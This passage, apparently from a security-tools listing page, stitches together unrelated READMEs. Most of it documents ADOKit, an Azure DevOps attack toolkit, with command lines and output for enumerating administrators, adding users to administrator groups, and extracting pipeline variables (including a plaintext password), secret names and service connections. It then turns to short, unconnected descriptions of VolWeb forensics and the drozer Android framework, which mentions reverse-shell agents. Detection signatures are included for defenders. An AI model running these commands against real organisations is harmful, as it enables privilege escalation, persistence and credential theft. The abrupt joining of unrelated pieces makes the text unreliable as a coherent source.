[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
Search for given group(s) in Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with each member of that group, including the user's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for each group that has permissions to the project. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: Listing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin
module along with a /project:
and /user:
for a given user to be removed from the Build Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin
module along with a /user:
for a given user to be added to the Project Collection Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin
module along with a /user:
for a given user to be removed from the Project Collection Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin
module along with a /user:
for a given user to be added to the Project Collection Build Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin
module along with a /user:
for a given user to be removed from the Project Collection Build Administrators
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc
module along with a /user:
for a given user to be added to the Project Collection Build Service Accounts
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc
module along with a /user:
for a given user to be removed from the Project Collection Build Service Accounts
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc
module along with a /user:
for a given user to be added to the Project Collection Service Accounts
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc
module along with a /user:
for a given user to be removed from the Project Collection Service Accounts
group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars
module along with a /project:
for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
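For reference, classic build definitions expose their variables through the documented Build REST API, and variables flagged as secret come back without a value (which is what the getpipelinesecrets module below reports as [HIDDEN]). The sketch below is a hedged illustration, not ADOKit's implementation; it assumes the requests package, a PAT with read access, and endpoint/field names from the public API reference:

```python
# Hedged sketch, not ADOKit's implementation. Assumptions: the "requests"
# package is installed and the PAT has Build (read) access. Endpoint and field
# names are taken from the public Build REST API reference.
import requests

ORGANIZATION = "YourOrganization"  # assumption
PROJECT = "maraudersmap"           # assumption
PAT = "your-pat-here"              # assumption
BASE = f"https://dev.azure.com/{ORGANIZATION}/{PROJECT}/_apis/build/definitions"
AUTH = ("", PAT)

definitions = requests.get(f"{BASE}?api-version=7.1", auth=AUTH, timeout=30).json().get("value", [])
for definition in definitions:
    # The list call returns references only; fetch each full definition to see its variables.
    full = requests.get(f"{BASE}/{definition['id']}?api-version=7.1", auth=AUTH, timeout=30).json()
    for name, var in (full.get("variables") or {}).items():
        value = "[HIDDEN]" if var.get("isSecret") else var.get("value")
        print(f"{definition['name']}: {name} = {value}")
```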
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets
module along with a /project:
for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all
in the /project:
argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections
module along with a /project:
for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all
in the /project:
argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
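For reference, the documented Service Endpoints REST API lists the same connections; credentials attached to a connection are never returned, so this only tells the operator where to dig next. A hedged sketch under the same assumptions as the previous examples (requests package, a PAT with read access, endpoint names from the public API reference):

```python
# Hedged sketch, not ADOKit's implementation. Assumptions: the "requests"
# package is installed and the PAT can read service connections; the endpoint
# name is taken from the public Service Endpoints REST API reference.
import requests

ORGANIZATION = "YourOrganization"  # assumption
PROJECT = "maraudersmap"           # assumption
PAT = "your-pat-here"              # assumption

url = (f"https://dev.azure.com/{ORGANIZATION}/{PROJECT}"
       "/_apis/serviceendpoint/endpoints?api-version=7.1-preview.4")
response = requests.get(url, auth=("", PAT), timeout=30)
response.raise_for_status()

for endpoint in response.json().get("value", []):
    # Credentials attached to an endpoint are not returned by this API.
    print(endpoint.get("name"), "|", endpoint.get("type"), "|", endpoint.get("id"))
```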
Below are static signatures for the specific usage of this tool in its default state:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json
- Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
PersistenceTechniqueWithADOKit.json
- Detects the creation of a PAT or SSH key with ADOKit
For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.
The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.
By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.
The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.
[!IMPORTANT] Take time to read the documentation in order to avoid common misconfiguration issues.
VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository offering scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts. Check the project wiki to learn more about the available API calls.
If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.
Contact me at k1nd0ne@mail.com for any questions regarding this tool.
Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1
drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used, with little to no programming experience required, to show the impact of leaving certain components exported on a device.
drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/
To help make sure drozer can be run on modern systems, a Docker container was created that has a working build of drozer. This is currently the recommended method of using drozer on modern systems.
Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.
Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel
sudo pip install dist/drozer-2.x.x-py2-none-any.whl
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb
sudo dpkg -i drozer-2.x.x.deb
git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm
sudo rpm -i drozer-2.x.x-1.noarch.rpm
